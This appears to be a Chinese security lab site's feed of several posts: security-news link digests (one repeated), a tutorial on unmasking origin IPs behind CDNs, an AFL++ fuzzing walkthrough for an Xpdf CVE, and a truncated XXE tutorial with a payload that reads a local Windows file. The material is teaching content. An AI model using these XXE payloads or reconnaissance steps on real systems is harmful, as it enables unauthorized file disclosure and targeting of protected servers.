免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、公安部公布五类高发电信网络诈骗类型，"刷单"占榜首 http://www.gov.cn/xinwen/2022-05/11/content_5689723.htm 2、Play Store 上的 200 多个应用正在分发 Facestealer信息窃取器 https://securityaffairs.co/wordpress/131370/malware/facestealer-info-stealer-play-store.html 3、卡巴斯基研究发现2022 年 HTML 附件在网络钓鱼攻击中仍然很流行 https://www.bleepingcomputer.com/news/security/html-attachments-remain-popular-among-phishing-actors-in-2022/ 4、委内瑞拉心脏病专家被指控经营和销售Thanos勒索软件 https://securityaffairs.co/wordpress/131382/cyber-crime/venezuelan-man-accused-thanos-ransomware.html 5、链家IT管理员删除公司9TB数据，被判7年有期徒刑 https://www.freebuf.com/news/333221.html 6、英国政府制定了《2022年民用核网络安全战略》 https://www.infosecurity-magazine.com/news/uk-sets-out-nuclear-cybersecurity/ 7、虚假移动应用窃取Facebook凭据和加密货币密钥 https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html 8、利用已修复的微软SharePoint漏洞可发起RCE攻击 https://portswigger.net/daily-swig/sharepoint-rce-bug-resurfaces-three-months-after-being-patched-by-microsoft 9、自定义PowerShell RAT以乌克兰信息为诱饵针对德国 https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/ 10、NSA 表示美国新加密标准没有后门 https://www.solidot.org/story?sid=71525

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现新型BLE蓝牙中继攻击 https://www.securityweek.com/researchers-devise-new-type-bluetooth-le-relay-attacks 2、勒索软件团伙威胁要推翻哥斯达黎加政府 https://www.securityweek.com/ransomware-gang-threatens-overthrow-costa-rica-government 3、研究人员发现可以利用低功耗模式在关机的iPhone上运行恶意软件 https://www.securityweek.com/hackers-can-abuse-low-power-mode-run-malware-powered-iphones 4、Apple发布更新修复了自 2022 年初以来的第六个0day漏洞 https://securityaffairs.co/wordpress/131346/security/apple-sixth-zero-day-2022.html 5、Armageddon APT组织发起新的网络钓鱼攻击 https://securityaffairs.co/wordpress/131296/breaking-news/cert-ua-warns-armageddon-apt.html 6、虚假Pixelmon NFT网站分发密码窃取恶意软件 https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/ 7、欧洲宣布采用旨在加强网络安全的新NIS2指令 https://thehackernews.com/2022/05/europe-agrees-to-adopt-new-nis2.html 8、研究人员通过DLL劫持漏洞阻止REvil勒索软件 https://portswigger.net/daily-swig/researcher-stops-revil-ransomware-in-its-tracks-with-dll-hijacking-exploit 9、小伙浏览涉黄APP，5天被骗142万！ https://www.anquanke.com/post/id/273098 10、BPFdoor：隐形 Linux 恶意软件绕过防火墙进行远程访问 https://www.bleepingcomputer.com/news/security/bpfdoor-stealthy-linux-malware-bypasses-firewalls-for-remote-access/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Sysrv 僵尸网络新变种Sysrv-K利用Spring和WordPress漏洞 https://securityaffairs.co/wordpress/131290/cyber-crime/microsoft-sysrv-botnet-new-exploits.html 2、SonicWall 敦促客户修复 SMA 1000 产品中的高危漏洞 https://securityaffairs.co/wordpress/131247/security/sonicwall-urges-customers-to-fix-sma-1000-vulnerabilities.html 3、Zyxel 防火墙修复了一个严重RCE漏洞 https://securityaffairs.co/wordpress/131243/hacking/zyxel-critical-flaw.html 4、伊朗黑客利用 BitLocker 和 DiskCryptor 进行勒索软件攻击 https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html 5、西门子楼宇自动化控制器存在漏洞可被黑客攻击 https://www.securityweek.com/hackers-can-make-siemens-building-automation-controllers-unavailable-days 6、InHand Networks 工业路由器存在多个高危漏洞 https://www.securityweek.com/critical-vulnerabilities-provide-root-access-inhand-industrial-routers 7、研究人员披露为期数月的针对 14 家德国汽车制造商的恶意软件活动 https://cyware.com/news/malware-campaign-targets-at-least-14-german-automakers-db0e9ea1 8、RedLine Stealer新活动通过YouTube传播 https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload 9、Legion黑客组织对欧洲歌唱大赛官网发起攻击 https://securityaffairs.co/wordpress/131280/hacktivism/legion-collective-call-attack-eurovision.html 10、谷歌发布更新修复Chrome中的高严重性漏洞 https://www.securityweek.com/chrome-101-update-patches-high-severity-vulnerabilities

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Sysrv 僵尸网络新变种Sysrv-K利用Spring和WordPress漏洞 https://securityaffairs.co/wordpress/131290/cyber-crime/microsoft-sysrv-botnet-new-exploits.html 2、SonicWall 敦促客户修复 SMA 1000 产品中的高危漏洞 https://securityaffairs.co/wordpress/131247/security/sonicwall-urges-customers-to-fix-sma-1000-vulnerabilities.html 3、Zyxel 防火墙修复了一个严重RCE漏洞 https://securityaffairs.co/wordpress/131243/hacking/zyxel-critical-flaw.html 4、伊朗黑客利用 BitLocker 和 DiskCryptor 进行勒索软件攻击 https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html 5、西门子楼宇自动化控制器存在漏洞可被黑客攻击 https://www.securityweek.com/hackers-can-make-siemens-building-automation-controllers-unavailable-days 6、InHand Networks 工业路由器存在多个高危漏洞 https://www.securityweek.com/critical-vulnerabilities-provide-root-access-inhand-industrial-routers 7、研究人员披露为期数月的针对 14 家德国汽车制造商的恶意软件活动 https://cyware.com/news/malware-campaign-targets-at-least-14-german-automakers-db0e9ea1 8、RedLine Stealer新活动通过YouTube传播 https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload 9、Legion黑客组织对欧洲歌唱大赛官网发起攻击 https://securityaffairs.co/wordpress/131280/hacktivism/legion-collective-call-attack-eurovision.html 10、谷歌发布更新修复Chrome中的高严重性漏洞 https://www.securityweek.com/chrome-101-update-patches-high-severity-vulnerabilities

近日HVV培训以及面试，有人问了CDN该如何绕过找到目标真实IP，这向来是个老生常谈的问题，而且网上大多都有，但是有些不够全面，今天把绕过CDN全理一理。术语叫做“深入浅出”。 　CDN简介 　定义 　内容分发网络（英语：Content Delivery Network或Content Distribution Network，缩写：CDN）是指一种透过https://zh.wikipedia.org/wiki/%E4%BA%92%E8%81%AF%E7%B6%B2互相连接的电脑网络系统，利用最靠近每位用户的服务器，更快、更可靠地将音乐、图片、视频、应用程序及其他文件发送给用户，来提供高性能、可扩展性及低成本的网络内容传递给用户。 　CDN是利用缓存技术，解决如何将数据快速可靠从源站传递到用户的问题。用户获取数据时，不需要直接从源站获取，通过CDN分发，用户可以从一个较优的服务器获取数据，从而达到快速访问，并减少源站负载压力的目的（负载均衡） 　工作过程 用户在浏览器输入域名，先向DNS服务器发送请求 DNS服务器将域名解析权交（通过CNAME）给CDN专用DNS服务器 客户端根据返回的ip访问CDN负载均衡设备 负载均衡设备根据当前的负载情况和用户所需内容，返回合适的ip 客户端最后根据ip访问对应的CDN缓存服务器 　优点 缓解原服务器访问压力 解决互联互通难题 解决网站突发流量的问题 合理利用互联网资源 全面预防单点故障 改善用户的访问的质量和体验 提供全面、准确、和详细的数据统计 有效的防治黑客攻击源站 ...... 　适用范围 　一般来说以资讯、内容等为主的网站，具有一定访问体量的网站 静态内容（html、js、css、image等，如图床） 视音频、大文件下载，分发加速：哔哩哔哩、腾讯等视频，百度云盘、蓝奏云等 视频直播加速：斗鱼、淘宝、虎牙直播 移动应用加速：移动app内图片、页面、短视频、UGC等内容，小程序等 　像直播这一类必有CDN，因为一个网站直播流涌入大量用户，现在任何一家直播平台都没有直接负载的服务器能力。看直播再快的网速都有一定延迟的原因之一就是，需要在CDN里缓存一部分，用户从CDN里观看。 　判断是否存在CDN 　方法一：PingPingPing 　不同地区对应着不同的CDN中心，所以使用不同站点的ping服务可分配到不同的CDN。这很简单，使用各种多站点ping服务来检查对应的IP地址是否唯一。如果不是唯一的，则使用大多数 CDN。多站Ping网站为： 　http://ping.chinaz.com/http://ping.aizhan.com/http://tools.ipip.net/ping.php （强烈推荐这个，这个默认多站ping，真的很多） 　方法二：nslookup 　使用 nslookup 进行检测，原理同上，如果返回域名解析对应多个 IP 地址多半是使用了 CDN。 　有 CDN 的示例： > ctfking.com 服务器:  public1.alidns.com Address:  223.5.5.5 非权威应答: 名称:    d831e3eec87f7d3c02a6-mini-l2.qcloudzygj.com Addresses:  106.55.85.170          106.55.85.167          106.55.86.71 Aliases:  ctfking.com          d14ca549ac628ef817e7beaa5095976f.qcloudwzgj.com 　无CDN的示例： > nbufe.edu.cn 服务器:  public1.alidns.com Address:  223.5.5.5 名称:    nbufe.edu.cn 　方法三：工具 　https://www.cdnplanet.com/tools/cdnfinder/ 　CDN绕过 　方法一：查询DNS解析记录 　1.查看IP与域名绑定的历史记录。使用 CDN 之前可能有记录。相关查询网站为： 　https://dnsdb.io/zh-cn/ 　https://x.threatbook.cn/ 　https://sitereport.netcraft.com/ 　https://tools.ipip.net/cdn.php（没错又是这个网站，它太猛了） 　2.借助Securitytrails平台（https://securitytrails.com/） 　攻击者可以查明真实的原始IP。他们只需在搜索字段中输入站点域名并按 ENTER，即可在左侧菜单中找到“历史数据”。 　如何找到隐藏在 CloudFlare 或 Tor 背后的真实原始 IP？ 　除了过去的 DNS 记录，即使是当前的记录也可能泄露原始服务器 IP。例如，MX 记录是查找 IP 的常用方法。如果网站在与 Web 相同的服务器和 IP 上托管自己的邮件服务器，则原始服务器 IP 将在 MX 记录中。 　方法二：查询子域名 　毕竟CDN还是不便宜，所以很多站长可能只会在主站或者流量大的子站做一个CDN，而很多小站子站跟主站在同一个服务器或者同C段，此时可以通过子域对应的IP查询，帮助找到真实IP站点。 https://x.threatbook.cn/上面提到的微步在线功能强大，黑客只需输入域名即可查找（如baidu.com），点击子域选项即可找到其子域，但免费用户每月只有5次免费查询机会。 https://dnsdb.io/zh-cn/黑客只需要输入baidu.com TYPE:A就可以收集到百度的子域名和IP。 https://www.google.com/谷歌站点：baidu.com-www 可以看到除WWW以外的子域 子域扫描器 Layer子域名挖掘机和lijiejie的subdomain那个工具都很不错 推荐长亭的xray 　方法三：网络空间引擎 　fofa、鹰图、Zoomeye、shodan、360 　推荐鹰图 　只需输入：title:“网站的title关键字”或者body：“网站的body特征”就可以找出收录的有这些关键字的ip域名，很多时候能获取网站的真实ip 　方法四：使用SSL证书寻找真实原IP 　如果您在 xyz123boot.com 上托管服务，则原始服务器 IP 为 136.23.63.44。CloudFlare 将为您提供 DDoS 防护、Web 应用防火墙和其他一些https://www.webshell.cc/tag/security服务，以保护您的服务免受攻击。为此，您的 Web 服务器必须支持 SSL 并具有证书。此时，CloudFlare 与您的服务器之间的通信，就像您与 CloudFlare 之间的通信一样，将被加密（即没有灵活的 SSL）。这看起来很安全，但问题是当你直接连接到443端口（https://136.23.63.44:443）上的IP时，会暴露SSL证 　此时，如果攻击者扫描0.0.0.0/0，整个互联网，就可以在xyz123boot.com的443端口获取有效证书，进而获取提供给你的web服务器IP。 　目前，Censys 工具可以扫描整个互联网。Censys 是用于搜索联网设备信息的新搜索引擎。安全专家可以使用它来评估其实施的安全性，黑客可以使用它作为初步调查。攻击目标和收集目标信息的强大武器。Censys 搜索引擎可以扫描整个互联网。Censys每天扫描IPv4地址空间，搜索所有联网设备并收集相关信息，并返回资源（如设备、网站、证书等）配置和部署的整体报告。 　攻击者唯一需要做的就是将上述搜索词转换为实际的搜索查询参数。 　xyz123boot.com证书的搜索查询参数为：parsed.names: xyz123boot.com 　只显示有效证书的查询参数为：tags.raw:trusted 　攻击者可以在 Censys 上实现多个参数的组合，这可以通过使用简单的布尔逻辑来完成。 　组合的搜索参数是：parsed.names：xyz123boot.com 和 tags.raw：trusted 　Censys 将向您显示在扫描中找到的符合上述搜索条件的所有标准证书。 　要一一查看这些搜索结果，攻击者可以通过单击右侧的“探索”来打开一个包含多个工具的下拉菜单。什么在使用这个证书？> IPv4 主机 　使用给定的 SSL 证书 　如果您是执法人员，并且想找到隐藏在 cheesecp5vaogohv.onion 下的儿童色情网站。最好的办法是找到它的原始IP，这样就可以追踪它的托管服务器，甚至可以找出它背后的运营商和财务线索。 　隐藏服务具有 SSL 证书。要查找它使用的 IPv4 主机，只需将“SHA1 指纹”（签名证书的 sha1 值）粘贴到 Censys IPv4 主机搜索中即可找到证书。这种方法很容易找到配置错误的Web服务器。 　方法五：使用HTTP头找到真正的原始IP 　借助 SecurityTrails 这样的平台，任何人都可以在海量的大数据中搜索自己的目标，甚至可以通过比较 HTTP 标头找到原始服务器。 　特别是当用户有一个非常特殊的服务器名称和软件名称时，攻击者更容易找到你。 　如果要搜索的数据很多，如上所述，攻击者可以在 Censys 上组合搜索参数。假设您正在与 1500 个 Web 服务器共享您的服务器 HTTP 标头，所有这些服务器都发送相同的标头参数和值组合。而且您还使用新的 PHP 框架来发送唯一的 HTTP 标头（例如：X-Generated-Via: XYZ 框架），目前约有 400 位网站管理员使用该框架。最终，在三台服务器的交汇处，通过人工操作即可找到IP，整个过程仅需几秒。 　例如，Censys上用于匹配服务器头的搜索参数为80.http.get.headers.server:，查找CloudFlare服务的网站的参数如下： 　80.http.get.headers.server:cloudflare 　方法六：利用网站返回的内容寻找真实的原IP 　如果原服务器IP也返回网站内容，可以在网上搜索很多相关资料。 　浏览网站源代码以查找独特的代码片段。在 JavaScript 中使用具有访问权限或标识符参数的第三方服务（例如 Google Analytics、reCAPTCHA）是攻击者经常使用的一种方法。 　以下是从 HackTheBox 网站获得的 Google Analytics 跟踪代码示例： 　ga('创建','UA-93577176-1','auto');80.http.get.body 可以使用：参数通过body/source过滤Censys数据。不幸的是，普通搜索字段有局限性。但是您可以在 Censys 请求研究访问权限，这使您可以通过 Google BigQuery 进行更强大的查询。 　Shodan 是一个类似于 Censys 的服务，同样提供 http.html 搜索参数。 　搜索示例：https://www.shodan.io/search?query=http.html%3AUA-32023260-1 　方法七：使用外地主机解析域名 　国内很多CDN厂商因为各种原因只做国内线，国外线路可能几乎没有。这时候我们可能会使用外地主机直接访问真实IP。 　方法八：网站漏洞搜索 目标敏感文件泄露，如phpinfo、GitHub信息泄露等探针 XSS盲打、命令执行反向shell、SSRF等 无论是社会工程还是其他手段，目标网站获取CDN中的管理员账号，在CDN的配置中可以找到网站的真实IP。 　方法九：网站邮件订阅搜索 　RSS邮件订阅，很多网站都有自己的sendmail，会发邮件给我们。此时，服务器的真实IP将包含在邮件的源代码中。 　方法十：用Zmap扫描全网 　要找到xiaix.me网站的真实IP，我们首先从apnic获取IP段，然后使用Zmap的banner-grab扫描出开放80端口的主机进行banner抓包，最后在Host中写入xiaix.me http请求。 　方法十一：F5 LTM解码方法 　服务器使用F5 LTM进行负载均衡时，也可以通过set-cookie关键字解码得到真实ip，例如：Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000，第一个小数部分的十进制数是487098378取出来，然后转换成十六进制数1d08880a，然后从后往前，取出四位数字，就是0a.88.08.1d，最后再转换成十进制数10.136.8.29，也是最后一个真实IP。 　方法十二：网页敏感信息 　这条思路来源于Jacko 　favicon哈希值 　根据网站图标哈希值搜索IP 　python2脚本 import mmh3 import requests response = requests.get('https://example.com/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print 'http.favicon.hash:'+str(hash) 　去fofa或者shodan上搜索该哈希值 　查询格式： fofa：icon_hash="xxx" shodan：http.favicon.hash:xxx 　HTML源代码检索查找IP 　根据网站页面HTML中特有的字符串去搜索引擎中搜索，如目标页面中由HTML标签为<title>的字段比较特殊，那么可以去FOFA中搜索： title="xxxxxxxxxxxxxxx" 　搜索到的结果会显示IP，访问该IP，若能够正常访问则为真正IP，如果打不开则为CDN或虚拟主机服务器 　参考文章： https://www.wolai.com/3xXwCoP1KEgkWWG8bnnianhttps://www.codetd.com/en/article/12945130

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、新的 Nerbian RAT 通过使用 COVID-19 钓鱼邮件活动传播 https://securityaffairs.co/wordpress/131221/cyber-crime/nerbian-rat-uses-covid-19-lure.html 2、大规模黑客活动破坏了数千个 WordPress 网站 https://securityaffairs.co/wordpress/131202/hacking/wordpress-websites-hacking-campaign.html 3、Red TIM Research (RTR) 披露 2 个影响 F5 Traffix SDC 的漏洞 https://securityaffairs.co/wordpress/131196/hacking/f5-traffix-sdc-flaws.html 4、英特尔内存漏洞对数百种产品构成风险 https://threatpost.com/intel-memory-bug-poses-risk-for-hundreds-of-products/179595/ 5、惠普修补了影响 200 多种型号计算机的 UEFI 漏洞 https://www.securityweek.com/hp-patches-uefi-vulnerabilities-affecting-over-200-computers 6、Malware Builder 利用 Discord Webhook https://threatpost.com/malware-discord-webhooks/179605/ 7、英特尔修补了 BIOS、Boot Guard 中的高危漏洞 https://www.securityweek.com/intel-patches-high-severity-vulnerabilities-bios-boot-guard 8、数十万台柯尼卡打印机容易受到物理访问的黑客攻击 https://www.securityweek.com/konica-minolta-printers-vulnerable-hacking-physical-access 9、APT34使用新的Saitama后门针对约旦政府 https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/ 10、多家意大利机构的网站遭到Killnet黑客组织攻击 https://www.reuters.com/world/europe/pro-russian-hackers-target-italy-defence-ministry-senate-websites-ansa-news-2022-05-11/

序言 　Fuzzing101系列包含针对10 个真实目标的10个练习，在练习中一步一步学习Fuzzing技术的知识。 　模糊测试（Fuzzing/Fuzz）是一种自动化软件测试技术，它基于为程序提供随机或变异的输入值并监视它的异常和崩溃。 　AFL、libFuzzer 和 HonggFuzz 是现实世界应用中最多的三个模糊器，这三个都是覆盖引导的进化模糊器（Coverage-guided evolutionary fuzzer）。其中 进化（evolutionary）是一种受进化算法启发的元启发式方法，它基本上包括通过使用选择标准（例如覆盖率）随时间推移初始子集（种子）的进化和变异。 覆盖引导（Coverage-guided）是指为了增加发现新崩溃的机会，覆盖引导的模糊器收集和比较不同输入之间的代码覆盖率数据，并选择那些导致新执行路径的输入。 　在这个练习中，我们将fuzz Xpdf PDF 查看器。目的是在 XPDF 3.02 中找到 CVE-2019-13288 的崩溃/PoC。 　CVE-2019-13288 是一个漏洞，它可能会通过精心制作的文件导致无限递归。由于程序中每个被调用的函数都会在栈上分配一个栈帧，如果一个函数被递归调用这么多次，就会导致栈内存耗尽和程序崩溃。因此，远程攻击者可以利用它进行 DoS 攻击。可以在以下链接中找到有关不受控制的递归漏洞的更多信息：https://cwe.mitre.org/data/definitions/674.html 　你会学到什么 　完成本练习后，你将了解使用 AFL 进行 fuzz 的基础，例如： 使用检测编译目标应用程序 运行模糊器（afl-fuzz） 使用调试器 (GDB) 对崩溃进行分类 　环境 　所有练习都在 Ubuntu 20.04.2 LTS 上进行了测试。 我强烈建议您使用相同的操作系统版本以避免不同的模糊测试结果，并在裸机硬件而不是虚拟机上运行 AFL，以获得最佳性能。 　否则，您可以在此处找到 https://drive.google.com/file/d/1_m1x-SHcm7Muov2mlmbbt8nkrMYp0Q3K/view?usp=sharing 镜像。用户名为 fuzz / fuzz。 　AFL 使用非确定性测试算法，因此两个模糊测试会话永远不会相同。我强烈建议设置一个固定的种子（-s 123），这样你的模糊测试结果将与本文的结果相似。 　下载并构建目标 　首先为要进行模糊测试的项目创建一个新目录： cd $HOME mkdir fuzzing_xpdf && cd fuzzing_xpdf/ 　为了完全准备好环境，需要安装一些额外的工具（make 和 gcc） sudo apt install build-essential 　下载 Xpdf 3.02： wget https://dl.xpdfreader.com/old/xpdf-3.02.tar.gz tar -xvzf xpdf-3.02.tar.gz 　构建 Xpdf： cd xpdf-3.02 sudo apt update && sudo apt install -y build-essential gcc ./configure --prefix="$HOME/fuzzing_xpdf/install/" make make install 　下面对 Xpdf 进行测试，首先下载一些 PDF 示例： cd $HOME/fuzzing_xpdf mkdir pdf_examples && cd pdf_examples wget https://github.com/mozilla/pdf.js-sample-files/raw/master/helloworld.pdf wget http://www.africau.edu/images/default/sample.pdf wget https://www.melbpc.org.au/wp-content/uploads/2017/10/small-example-pdf-file.pdf 　使用以下命令测试 pdfinfo 二进制文件： $HOME/fuzzing_xpdf/install/bin/pdfinfo -box -meta $HOME/fuzzing_xpdf/pdf_examples/helloworld.pdf 　安装 AFL++ 　我们将使用最新版本的 AFL++ fuzzer(https://github.com/AFLplusplus/AFLplusplus) 　安装依赖项 sudo apt-get update sudo apt-get install -y build-essential python3-dev automake git flex bison libglib2.0-dev libpixman-1-dev python3-setuptools sudo apt-get install -y lld-11 llvm-11 llvm-11-dev clang-11 || sudo apt-get install -y lld llvm llvm-dev clang sudo apt-get install -y gcc-$(gcc --version|head -n1|sed 's/.* //'|sed 's/\..*//')-plugin-dev libstdc++-$(gcc --version|head -n1|sed 's/.* //'|sed 's/\..*//')-dev 　构建 AFL++ cd $HOME git clone https://github.com/AFLplusplus/AFLplusplus && cd AFLplusplus export LLVM_CONFIG="llvm-config-11" make distrib sudo make install 　执行afl-fuzz，查看是否安装成功 　认识 AFL++ 　AFL 是一个覆盖引导的模糊器（coverage-guided fuzzer），这意味着它收集每个变异输入的覆盖信息，来发现新的执行路径和潜在的错误。当源代码可用时，AFL 可以使用插桩（instrumentation），在每个基本块（函数、循环等）的开头插入函数调用。 　要为我们的目标程序启用检测，我们需要使用 AFL 的编译器编译源代码。 　首先，我们要清理所有之前编译的目标文件和可执行文件： rm -r $HOME/fuzzing_xpdf/install cd $HOME/fuzzing_xpdf/xpdf-3.02/ make clean 　现在我们将使用 afl-clang-fast 编译器构建 xpdf： export LLVM_CONFIG="llvm-config-11" CC=$HOME/AFLplusplus/afl-clang-fast CXX=$HOME/AFLplusplus/afl-clang-fast++ ./configure --prefix="$HOME/fuzzing_xpdf/install/" make make install 　现在可以使用以下命令运行 fuzzer： afl-fuzz -i $HOME/fuzzing_xpdf/pdf_examples/ -o $HOME/fuzzing_xpdf/out/ -s 123 -- $HOME/fuzzing_xpdf/install/bin/pdftotext @@ $HOME/fuzzing_xpdf/output 　每个选项的简要说明 -i 表示输入示例的目录 -o 表示 AFL + + 将存储的变异文件的目录 -s 表示要使用的静态随机种子 @@ 是占位符目标的命令行，AFL 将用每个输入文件名替换 　fuzzer将会对每个不同的输入文件运行 $HOME/fuzzing_xpdf/install/bin/pdftotext <input-file-name> $HOME/fuzzing_xpdf/output 命令 　出现错误，根据提示，执行以下操作： sudo su echo core >/proc/sys/kernel/core_pattern exit 　成功运行，等待一段时间后，发现已经有了一个crash 　可以在$HOME/fuzzing_xpdf/out/ 目录中找到这些崩溃文件。一旦发现第一次崩溃，就可以停止fuzzer，上图中已经出现了一个独特的崩溃。根据您的机器性能，最多可能需要一到两个小时才能发生崩溃。 　为了完成这个练习，下面尝试使用指定的文件重现崩溃，调试崩溃发现问题，并且修复问题。 　重现崩溃 　在$HOME/fuzzing_xpdf/out/目录下找到 crash 对应的文件。文件名类似于id:000000,sig:11,src:000390,time:103613,execs:71732,op:havoc,rep:16 　将此文件作为输入传递给 pdftotext $HOME/fuzzing_xpdf/install/bin/pdftotext '/home/fuzz/fuzzing_xpdf/out/default/crashes/<your_filename>' $HOME/fuzzing_xpdf/output 　它将导致段错误segmentation fault并导致程序崩溃。 　调试 　使用 gdb 找出程序因该输入而崩溃的原因。 　首先使用调试信息重建 Xpdf 来获得符号堆栈跟踪： rm -r $HOME/fuzzing_xpdf/install cd $HOME/fuzzing_xpdf/xpdf-3.02/ make clean CFLAGS="-g -O0" CXXFLAGS="-g -O0" ./configure --prefix="$HOME/fuzzing_xpdf/install/" make make install 　然后使用GDB，输入run gdb --args $HOME/fuzzing_xpdf/install/bin/pdftotext $HOME/fuzzing_xpdf/out/default/crashes/<your_filename> $HOME/fuzzing_xpdf/output 　然后输入bt回溯查看栈帧 　发现有许多次Parser::getObj的调用，它们似乎表示一个无限递归。如果你去 https://www.cvedetails.com/cve/cve-2019-13288/ ，你可以看到描述符合我们从 GDB 得到的回溯。 　实验推荐 　实验：Fuzz之AFL（蚁景网安实验室）　https://www.yijinglab.com/expc.do?ec=ECID5ec5-3232-4f16-8c14-c98b75f8915d>>

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Chrome 101 更新补丁修复高危漏洞 https://www.securityweek.com/chrome-101-update-patches-high-severity-vulnerabilities 2、多个SaaS 应用程序的短URL 可被用于网络钓鱼和社会工程 https://www.securityweek.com/saas-app-vanity-urls-can-be-spoofed-phishing-social-engineering 3、医疗保健技术提供商 Omnicell 遭勒索软件攻击 https://www.securityweek.com/healthcare-technology-provider-omnicell-discloses-ransomware-attack 4、研究人员警告 Nerbian RAT 针对意大利、西班牙和英国的实体 https://thehackernews.com/2022/05/researchers-warn-of-nerbian-rat.html 5、林肯学院遭勒索软件攻击而停课 https://threatpost.com/ransomware-deathblow-college/179574/ 6、FluBot Android 恶意软件以芬兰用户为目标 https://www.bleepingcomputer.com/news/security/flubot-android-malware-targets-finland-in-new-sms-campaigns/ 7、研究人员发现一种新的网络钓鱼即服务Frappo https://securityaffairs.co/wordpress/131136/cyber-crime/frappo-phishing-as-a-service.html 8、新的恶意NPM包针对德国公司进行供应链攻击 https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/ 9、2100万VPN用户的个人信息在Telegram上泄露 https://www.hackread.com/personal-details-supervpn-geckovpn-users-telegram-leaked/ 10、微软修复了所有Windows版本中的新NTLM零日漏洞 https://www.freebuf.com/articles/332788.html

xml介绍 　XML是一种非常流行的标记语言，在解析外部实体的过程中，XML解析器可以根据URL中指定的方案（协议）来查询各种网络协议和服务（DNS，FTP，HTTP，SMB等）。 外部实体对于在文档中创建动态引用非常有用，这样对引用资源所做的任何更改都会在文档中自动更新。 但是，在处理外部实体时，可以针对应用程序启动许多攻击。 这些攻击包括泄露本地系统文件，这些文件可能包含密码和私人用户数据等敏感数据，或利用各种方案的网络访问功能来操纵内部应用程序。 通过将这些攻击与其他实现缺陷相结合，这些攻击的范围可以扩展到客户端内存损坏，任意代码执行，甚至服务中断，具体取决于这些攻击的上下文。 　内部实体 　XML 文档有自己的一个格式规范，这个格式规范是由一个叫做 DTD（document type definition） 的东西控制的。 <?xml version="1.0"?>//这一行是 XML 文档定义 <!DOCTYPE message [ <!ELEMENT message (receiver ,sender ,header ,msg)> <!ELEMENT receiver (#PCDATA)> <!ELEMENT sender (#PCDATA)> <!ELEMENT header (#PCDATA)> <!ELEMENT msg (#PCDATA)> 　上面这个 DTD 就定义了 XML 的根元素是 message，然后跟元素下面有一些子元素，那么 XML 到时候必须像下面这么写 <message> <receiver>Myself</receiver> <sender>Someone</sender> <header>TheReminder</header> <msg>This is an amazing book</msg> </message> 　其实除了在 DTD 中定义元素（其实就是对应 XML 中的标签）以外，我们还能在 DTD 中定义实体(对应XML 标签中的内容)，毕竟 XML 中除了能标签以外，还需要有些内容是固定的 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe "test" >]> 　这里 定义元素为 ANY 说明接受任何元素，但是定义了一个 xml 的实体（实体其实可以看成一个变量，到时候我们可以在 XML 中通过 & 符号进行引用），那么 XML 就可以写成这样 　示例代码： <creds> <user>&xxe;</user> <pass>mypass</pass> </creds> 　我们使用 &xxe 对 上面定义的 xxe 实体进行了引用，到时候输出的时候 &xxe 就会被 "test" 替换。 　外部实体 　示例代码： <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]> <creds>    <user>&xxe;</user>    <pass>mypass</pass> </creds> 　当然，还有一种引用方式是使用 引用公用 DTD 的方法，语法如下： <!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”> 　我们上面已经将实体分成了两个派别（内部实体和外部外部），但是实际上从另一个角度看，实体也可以分成两个派别（通用实体和参数实体）。 　通用实体 　用 &实体名;在DTD 中定义，在 XML 文档中引用 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile>      <firstname>Joe</firstname>      <lastname>&file;</lastname>     ... </updateProfile> 　参数实体 　(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义，并且只能在 DTD 中使用 %实体名; 引用(2)只有在 DTD 文件中，参数实体的声明才能引用其他实体(3)和通用实体一样，参数实体也可以外部引用 　示例代码： <!ENTITY % an-element 